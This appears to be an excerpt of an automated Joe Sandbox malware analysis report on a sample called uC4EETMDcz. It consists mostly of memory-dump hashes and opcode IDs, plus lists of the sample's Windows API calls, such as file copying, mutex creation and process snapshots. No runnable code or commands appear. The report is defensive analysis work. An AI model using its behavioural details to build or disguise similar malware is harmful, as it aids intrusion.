                                              • Instruction Fuzzy Hash: 6490023144660C8B464067D57809656776DA544525B850151A50D415115A5578105595
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3$j
                                              • API String ID: 0-2246306619
                                              • Opcode ID: 2b476206e728528e36e3f24fb9c092e047ea051fb3441429e65318b16a8850bc
                                              • Instruction ID: 8ee0f87429c4308cb67fe06900df86d1229fd777a929736610c24a08ba886451
                                              • Opcode Fuzzy Hash: 2b476206e728528e36e3f24fb9c092e047ea051fb3441429e65318b16a8850bc
                                              • Instruction Fuzzy Hash: E6319FB1E156288BEB29CF5BCC4469AF6FBBFC9300F04C1F9950CA6255EB741A819F05
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: i
                                              • API String ID: 0-3865851505
                                              • Opcode ID: 8c65d9d99e21f0694e858070de9f010c82b108db3917dddbb63a43e8fe0564b4
                                              • Instruction ID: 108723aba323c8fd9c7f0eaef813dd9f4f28bb30370e8b1959972874e1868814
                                              • Opcode Fuzzy Hash: 8c65d9d99e21f0694e858070de9f010c82b108db3917dddbb63a43e8fe0564b4
                                              • Instruction Fuzzy Hash: E3412D71E01A188FEB58CF6B8C4469AFAF7AFC9201F14C1BA884CAA255EB7405859F15
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 61da49a1dd38c953f3a9def9261e715add2ffe45b07f2e3d56601716d7b6a3c8
                                              • Instruction ID: 5c48ab985d082b6875d6abbc5f81d290dbe6d04507ce4dde7f7320ad20498c1e
                                              • Opcode Fuzzy Hash: 61da49a1dd38c953f3a9def9261e715add2ffe45b07f2e3d56601716d7b6a3c8
                                              • Instruction Fuzzy Hash: 9612C671E006598FDB14CFAAC980A9EFBF2BF88304F24C569D458AB219D734AD46CF50
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ca5b0f7e8f0a75f75fd070111e797aaa7aa2b3b4bbeb648a9b71ecfab415b0d7
                                              • Instruction ID: 520bada680a163a73830260d33f2f5cb3fe306052eb6565817c34258cc45400c
                                              • Opcode Fuzzy Hash: ca5b0f7e8f0a75f75fd070111e797aaa7aa2b3b4bbeb648a9b71ecfab415b0d7
                                              • Instruction Fuzzy Hash: E8D11734A00205CFDB14DF69C588AAABBF6BF88310F658569ED05AB361DB34EC81DB54
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6d43e470b6e67ee50957326fff39b7e4d2ae58c17c3c960760fbec51fcd68092
                                              • Instruction ID: 1e67cdfdf1ce61ef68a481fbbe886f6771c17aec6bed5c9abc001b3030466693
                                              • Opcode Fuzzy Hash: 6d43e470b6e67ee50957326fff39b7e4d2ae58c17c3c960760fbec51fcd68092
                                              • Instruction Fuzzy Hash: F0C15C74E04218CFDB54EFA9E884BEEBBB2FB49304F104169D51AA7355DBB45986CF00
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ea19c7a686d067346d17ed7bc7e10096ef9ee43c2c84ac80e65b7b3017abf75
                                              • Instruction ID: e277d472e2bce6f8db79f8710385fb4cc1af9e363c737e44c11fc0dde5dbca8e
                                              • Opcode Fuzzy Hash: 6ea19c7a686d067346d17ed7bc7e10096ef9ee43c2c84ac80e65b7b3017abf75
                                              • Instruction Fuzzy Hash: A4C12974E05218CFDB14EFA9E884BEEBBB2FB49304F104169D51AA7355DBB85986CF00
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7d1aa0730d3acd263c0c1a496ecfe1cefcbdebd12d6e7d3a24afb69e77b1e3ab
                                              • Instruction ID: 1c6701f65a73fceb5084f194cc04aa6b1d6a55d2a571f07947ea9c6e71d338a3
                                              • Opcode Fuzzy Hash: 7d1aa0730d3acd263c0c1a496ecfe1cefcbdebd12d6e7d3a24afb69e77b1e3ab
                                              • Instruction Fuzzy Hash: 42B1F670E04218CFDB24DFAAD994BADBBF2FB89304F109069D909A7345DB745986DF08
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 734ac27f598ea18b3d7eb59c414db028cb53a93cbd4268f8a43fac96b18f4413
                                              • Instruction ID: 69a8ff57658f6cae1ab5531a07687c637a27ea17219f1882cdd680d6d7052a70
                                              • Opcode Fuzzy Hash: 734ac27f598ea18b3d7eb59c414db028cb53a93cbd4268f8a43fac96b18f4413
                                              • Instruction Fuzzy Hash: D8B11770E00218CFDB14DFAAD994BADBBF2FB89304F1480A9D909A7345DB745986DF08
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4f018f4d648b950aab902748017fdeeaae5758122aefcf25f140210dbc172aa0
                                              • Instruction ID: 6b140b1035785d34e654661124c9745bc1c3f96ad9ab78aef7839e16bcbbf3b9
                                              • Opcode Fuzzy Hash: 4f018f4d648b950aab902748017fdeeaae5758122aefcf25f140210dbc172aa0
                                              • Instruction Fuzzy Hash: 2AC19575E016188FDB58DF6AC944ADDBBF2AF89300F14C1AAD909AB365DB305E81CF50
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7330a0d396ccea81869499c2252ea3d3df0f06350ac8cb1de74d93435fdd1d20
                                              • Instruction ID: 6a113e92ae48850d414ce7eccd182210bc2aa6382e1ddca1c8bf94ee574b5b16
                                              • Opcode Fuzzy Hash: 7330a0d396ccea81869499c2252ea3d3df0f06350ac8cb1de74d93435fdd1d20
                                              • Instruction Fuzzy Hash: B3A13B78E05218CFDB25DFA9C948BAEBBF6FF89300F1082A9D409A7255DB745985CF01
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399309198.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56e0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e8400e92c4ed032bf6042a97756e2ccaa52989f50530e915c278e06be4ec7a2
                                              • Instruction ID: 5d1f1bec762864cc6afdfb6eaef38ef8640f3133c5619fab4886dc8f015d8a08
                                              • Opcode Fuzzy Hash: 8e8400e92c4ed032bf6042a97756e2ccaa52989f50530e915c278e06be4ec7a2
                                              • Instruction Fuzzy Hash: 0C913974A06218CFDB14DFA9E988BAEBBF2FB49300F105569D40AA7345DB746986CF04
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399309198.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56e0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d0c9fb4f8e494b737592e763447b01b5543374688cddd07cebceacd231512c7d
                                              • Instruction ID: 67b73697e95c803fbdd5be703f201a3daa07eed46fdb5a2572a22891c9e6a2f8
                                              • Opcode Fuzzy Hash: d0c9fb4f8e494b737592e763447b01b5543374688cddd07cebceacd231512c7d
                                              • Instruction Fuzzy Hash: 08811970A06218CFDB14DFA9E988BAEB7F6FB4A300F105569D40AA7345DB746986CF04
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399639540.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5810000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 570167dd901333f961f57868a3bbae8490aac8bdbab80b9a7adf605f5e42500d
                                              • Instruction ID: da07b23cf3078983951ef682a5a67c6b0affd91f3d4124bee15ca9b78f47a980
                                              • Opcode Fuzzy Hash: 570167dd901333f961f57868a3bbae8490aac8bdbab80b9a7adf605f5e42500d
                                              • Instruction Fuzzy Hash: C181F870D0522CCFEB24DF66C844BADBBBABF49305F5490AAD809AB250DB745E85CF05
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399309198.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56e0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c1acc359987da8b044742a2144c88c7120f173d769a4a76880958c778686025b
                                              • Instruction ID: ce0d926ea21895234482051d063ff1e0a73f7d159d17bb0500172d1f2e4604b1
                                              • Opcode Fuzzy Hash: c1acc359987da8b044742a2144c88c7120f173d769a4a76880958c778686025b
                                              • Instruction Fuzzy Hash: 5F810C70E06218CFDB14DFA9D988BAEB7F2FB4A300F509569D40AA7355DB746982CF04
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 742426f734d6823b53799f061a9e6ab8e44a2ebd3e39c99705c65155ff7b2029
                                              • Instruction ID: 859ac07703f66e9c1c93e9644c46779ad4698a2e43d78d87e8346b1e34a67083
                                              • Opcode Fuzzy Hash: 742426f734d6823b53799f061a9e6ab8e44a2ebd3e39c99705c65155ff7b2029
                                              • Instruction Fuzzy Hash: 5271FB71A05209CFD708EFABE88069ABBF3FFC8310F14C529D0049B265DBB45946DB90
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 589d9406a70e83c0905c134abab51ddac034d9a519055a7c5edcc930be163dee
                                              • Instruction ID: 2323ea0174b1666b8b34310962f4bfb9ade1d44620a5242265416ad06d14baf0
                                              • Opcode Fuzzy Hash: 589d9406a70e83c0905c134abab51ddac034d9a519055a7c5edcc930be163dee
                                              • Instruction Fuzzy Hash: 82710C71E05209CFD708EFABE88069ABBF3FFC8310F14C529D0049B265EBB459469B90
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8afb01972dbb349651b91e02b5753d8352f6c540366d07b70bf63c30c80c2cde
                                              • Instruction ID: 44658e34a5e7e893bad80f0c7eed2a87e53657977832b8c9eae1017de9a7edff
                                              • Opcode Fuzzy Hash: 8afb01972dbb349651b91e02b5753d8352f6c540366d07b70bf63c30c80c2cde
                                              • Instruction Fuzzy Hash: 6C512479905208CFDB15DFA9D488BEDBBF2FB49308F10502AE00AA7244D7B85D86CF84
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5603645c8500c80764bee98f358927b5b5a487c0739d661a264f7a9696ec7bb1
                                              • Instruction ID: 561c5096222db3a5963c0b6c034a49f3e12a60bac66361f79c6fd567cfb8fe58
                                              • Opcode Fuzzy Hash: 5603645c8500c80764bee98f358927b5b5a487c0739d661a264f7a9696ec7bb1
                                              • Instruction Fuzzy Hash: 59510379909208CFDB15DFA9D488BEDBBF6FB4A308F10502AE40AA7254D7B45D85CF84
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2397433503.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5570000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c19d0b5fff0764014bd87f1ffd3df16a34b50bfafcd96598de0e3260574d2d40
                                              • Instruction ID: aabab71daec495fa535f4f0d85938fc023c04dcbf76a4a2f82cc85c9303a0e6e
                                              • Opcode Fuzzy Hash: c19d0b5fff0764014bd87f1ffd3df16a34b50bfafcd96598de0e3260574d2d40
                                              • Instruction Fuzzy Hash: 74516B71D056588BE728CF2B9D546CAFBF3AFC9300F04C1FA944CAA265EA7409868F51
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f626a98bb4585a288ace57a28cab130fd65d848f5d714dac18054de1e267d276
                                              • Instruction ID: fb190d728b7e962bc93ff96a7d83138e2d4178c82b2d2ddde3dd7cb6d6071462
                                              • Opcode Fuzzy Hash: f626a98bb4585a288ace57a28cab130fd65d848f5d714dac18054de1e267d276
                                              • Instruction Fuzzy Hash: 6E4148B1E006198BEB08CFABD94069EFBF3AFC8310F14C17AD958AB254DA7459468F54
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2397433503.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5570000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c75520571f8ac10e1c51836c5ead928b9e29ee2277dc8b33b705d13bf4a359bc
                                              • Instruction ID: 1b63b184d97b718e34c42c619b1ff4b3133efcf04e79cc4f43860f1f0cd8ee90
                                              • Opcode Fuzzy Hash: c75520571f8ac10e1c51836c5ead928b9e29ee2277dc8b33b705d13bf4a359bc
                                              • Instruction Fuzzy Hash: E9511D71D05A588BEB2CCF2B9D446DAFAF7AFC9300F04C1FA944CA6264DB744A858F51
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2397433503.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5570000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 18f2894ae97316440907e825545175e40ce3b3b80211eb19e2211741e392a844
                                              • Instruction ID: 83c12c2d13038b696cd8dfc97e4c531fe95d38910c55c4342a37707f92f7cc64
                                              • Opcode Fuzzy Hash: 18f2894ae97316440907e825545175e40ce3b3b80211eb19e2211741e392a844
                                              • Instruction Fuzzy Hash: B541DCB0D0424C9FDB14CFA9E984AADBBF1BF09310F20912AE819AB250D7749845CF95
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 072c692ea83e5ac9462f8847706a4f95122efd22221d4373935fae7041989cfa
                                              • Instruction ID: 212fbaa33e9761947f58efb0610b58ef227429f79314c5552e9b26288f8bd173
                                              • Opcode Fuzzy Hash: 072c692ea83e5ac9462f8847706a4f95122efd22221d4373935fae7041989cfa
                                              • Instruction Fuzzy Hash: 5B417371E05B548FE71DCF6B8D4029AFBF3AFC9211F19C0B68448AA225EA3409869F15
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399639540.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                              Joe Sandbox IDA Plugin

                                              Execution Graph

                                              Execution Coverage:26.3%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:29.8%
                                              Total number of Nodes:255
                                              Total number of Limit Nodes:4

                                              Callgraph


                                              Control-flow Graph

                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,0040150C,0040161A,00000000,00000000), ref: 0040105F
                                              • SetUnhandledExceptionFilter.KERNEL32(004030AC), ref: 00401069
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 00401086
                                              • EnumWindows.USER32(0040177F,00000000), ref: 004010DF
                                              • GetEnvironmentVariableW.KERNEL32(004056A9,?,00000200,004056A9,00000020,00000000,004056D3,00000018,004056EB,00000014,004056D3,00000018,00000000,?,00000200), ref: 00401103
                                              • CreateDirectoryW.KERNEL32(?,00000000,00000018,00000004,?,?,004056A9,00000020,00000000,004056A9,?,00000200,004056A9,00000020,00000000,004056D3), ref: 00401169
                                              • CopyFileW.KERNEL32(?,00000000,00000000,00000018,00000004,?,00000000,00000018,00000004,?,?,004056A9,00000020,00000000,004056A9,?), ref: 004011C1
                                              • CopyFileW.KERNEL32(?,00000000,00000000,00000000,?,004056A9,00000020,00000000,004056A9,?,00000200,004056A9,00000020,00000000,004056D3,00000018), ref: 00401242
                                              • Sleep.KERNELBASE(00000000,00405B44,00405AC4,0000EA60,004056D3,00000018,00000000,00000000,?,00000000,00000000,00000018,00000004,?,00000000,00000018), ref: 00401281
                                              • ExitProcess.KERNEL32(00000000), ref: 00403273
                                                • Part of subcall function 00402E87: LdrLoadDll.NTDLL(00000000,00405844,00000000,00000000,?,?,?,?,?,000000FF,?), ref: 00402F47
                                              • CreateMutexW.KERNEL32(00000000,00000001,?,004056D3,00000018,?), ref: 004012C2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: CreateFile$Copy$DirectoryEnumEnvironmentExceptionExitFilterLoadModuleMutexNameProcessSleepThreadUnhandledVariableWindows
                                              • String ID: $Q@
                                              • API String ID: 3972995194-360258219

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00402E87: LdrLoadDll.NTDLL(00000000,00405844,00000000,00000000,?,?,?,?,?,000000FF,?), ref: 00402F47
                                              • CoInitialize.OLE32(00000000,004058EB,004058E1,00000000,-000007A4,?,00000003), ref: 00401829
                                              • GetSystemTime.KERNEL32(?,?,00000030), ref: 004019AC
                                              • CoUninitialize.COMBASE(00000000,00405909,004058E1), ref: 00401AD8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: InitializeLoadSystemTimeUninitialize
                                              • String ID: 0
                                              • API String ID: 4010867600-4108050209

                                              Control-flow Graph

                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00405844,00000000,00000000,?,?,?,?,?,000000FF,?), ref: 00402F47
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0

                                              Control-flow Graph

                                              APIs
                                              • GetModuleHandleA.KERNEL32(00000000,Function_000056FF,00000009,?,00405708,0000000A,?), ref: 0040153D
                                              • LoadIconA.USER32(00000000,00007F04), ref: 0040157D
                                              • LoadCursorA.USER32(00000000,00007F01), ref: 0040158C
                                              • RegisterClassA.USER32(00000000), ref: 0040159F
                                              • ExitProcess.KERNEL32(00000080,?,?,00C80000,FFFFFC18,FFFFFC18,000001F4,00000096,00000000,00000000,?,00000000), ref: 004015D9
                                              • ShowWindow.USER32(?,00000001,00000080,?,?,00C80000,FFFFFC18,FFFFFC18,000001F4,00000096,00000000,00000000,?,00000000), ref: 004015E6
                                              • UpdateWindow.USER32(?), ref: 004015EE
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004015FD
                                              • TranslateMessage.USER32(?), ref: 00401606
                                              • DispatchMessageA.USER32(?), ref: 0040160F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: Message$LoadWindow$ClassCursorDispatchExitHandleIconModuleProcessRegisterShowTranslateUpdate
                                              • String ID:
                                              • API String ID: 2466556465-0
                                              • Opcode ID: 52ed46de41349f3d582880e95edfe2d678f06aed16e7b33847e1eb2bed05ec98
                                              • Instruction ID: 38260ba289d654bb8fed106bd4b6289030b46a1fee283fad4cc1d6262141adf0
                                              • Opcode Fuzzy Hash: 52ed46de41349f3d582880e95edfe2d678f06aed16e7b33847e1eb2bed05ec98
                                              • Instruction Fuzzy Hash: E8212A70D45308BAEF50EFE5CC46FDDBABCAB04705F2040AAF604BA1C1D7B95A048B69

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 207 40161a-401627 208 401629-40163a DefWindowProcA 207->208 209 40163c-40165f call 401ae1 call 402e87 call 402f5b 207->209 210 401664-401668 208->210 212 403271-403273 ExitProcess 209->212 210->212
                                              APIs
                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 00401635
                                              • ExitProcess.KERNEL32(00000000), ref: 00403273
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: ExitProcProcessWindow
                                              • String ID:
                                              • API String ID: 86880500-0
                                              • Opcode ID: 0db0ace64051bc717b682083bd426630cc0a35c42dd1c87597c3ebb1dfd9902d
                                              • Instruction ID: 8ed47dd494637e04bbeb240371057fe848f802d8e13938514175256acfb159fd
                                              • Opcode Fuzzy Hash: 0db0ace64051bc717b682083bd426630cc0a35c42dd1c87597c3ebb1dfd9902d
                                              • Instruction Fuzzy Hash: EAE03775244215BBDE013FD69C46F5B3A18DB44759F104837B705740E285BE4512AA7E

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00402E87: LdrLoadDll.NTDLL(00000000,00405844,00000000,00000000,?,?,?,?,?,000000FF,?), ref: 00402F47
                                              • CoInitialize.OLE32(00000000,004058EB,004058E1,00000000), ref: 00401BD5
                                              • CoUninitialize.COMBASE(00000000,00405909,004058E1), ref: 00401CB3
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: InitializeLoadUninitialize
                                              • String ID:
                                              • API String ID: 3228517379-0
                                              • Opcode ID: 2026d87ce0fc0066690c3eafbda8d8e5190af650b7c640b24d7c5ce032ee966f
                                              • Instruction ID: e53a606a692811635fe40b20f348e9617a3a8a3f765bf8268464583007073160
                                              • Opcode Fuzzy Hash: 2026d87ce0fc0066690c3eafbda8d8e5190af650b7c640b24d7c5ce032ee966f
                                              • Instruction Fuzzy Hash: 16312C75640608AFDB10EB95CC85F9FB3BCEB48304F1045A6B608F31D1DAB9AA419F68

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00402E87: LdrLoadDll.NTDLL(00000000,00405844,00000000,00000000,?,?,?,?,?,000000FF,?), ref: 00402F47
                                              • CoInitialize.OLE32(00000000,004058EB,004058E1,00000000), ref: 00401B04
                                              • CoUninitialize.COMBASE(00000000,00405909,004058E1), ref: 00401BA2
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: InitializeLoadUninitialize
                                              • String ID:
                                              • API String ID: 3228517379-0
                                              • Opcode ID: 8699d760873d2011b7bcdda1aef1fa91b68ec3378c32af1153d987c3fedd45c5
                                              • Instruction ID: b63da7821b3bd78901ee0d03bed2f3afbf60260133af94835a174438e475f7fe
                                              • Opcode Fuzzy Hash: 8699d760873d2011b7bcdda1aef1fa91b68ec3378c32af1153d987c3fedd45c5
                                              • Instruction Fuzzy Hash: EE114FB66406087ADA10F6E1CD4AF9F726CDB48708F204476B608F21C2DAB99E519E69

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 593 40166b-4016a1 call 402c3b CreateToolhelp32Snapshot 596 401772-40177c 593->596 597 4016a7-4016e3 call 402e43 call 402e87 call 402f5b 593->597 605 40176a-40176c 597->605 605->596 606 4016e8-401711 call 402d9b call 402e2b 605->606 611 401721-401724 606->611 612 401713-401716 611->612 613 401726-40173b call 402d55 611->613 615 401720 612->615 616 401718-40171b 612->616 619 401749-401768 call 402e87 call 402f5b 613->619 620 40173d-401747 613->620 615->611 616->615 618 40171d 616->618 618->615 619->605 620->596
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,000000FF,?), ref: 00401696
                                                • Part of subcall function 00402E87: LdrLoadDll.NTDLL(00000000,00405844,00000000,00000000,?,?,?,?,?,000000FF,?), ref: 00402F47
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: CreateLoadSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 291908380-0
                                              • Opcode ID: 7cb484f44f4f2ac094dc28ae1ce8c1ccb6d26d74b7766e19bd12f7139b2e2256
                                              • Instruction ID: 253468650f68ea59506e53e8194d7c382a21fc421dfc5e2cb0297ff1125e3e04
                                              • Opcode Fuzzy Hash: 7cb484f44f4f2ac094dc28ae1ce8c1ccb6d26d74b7766e19bd12f7139b2e2256
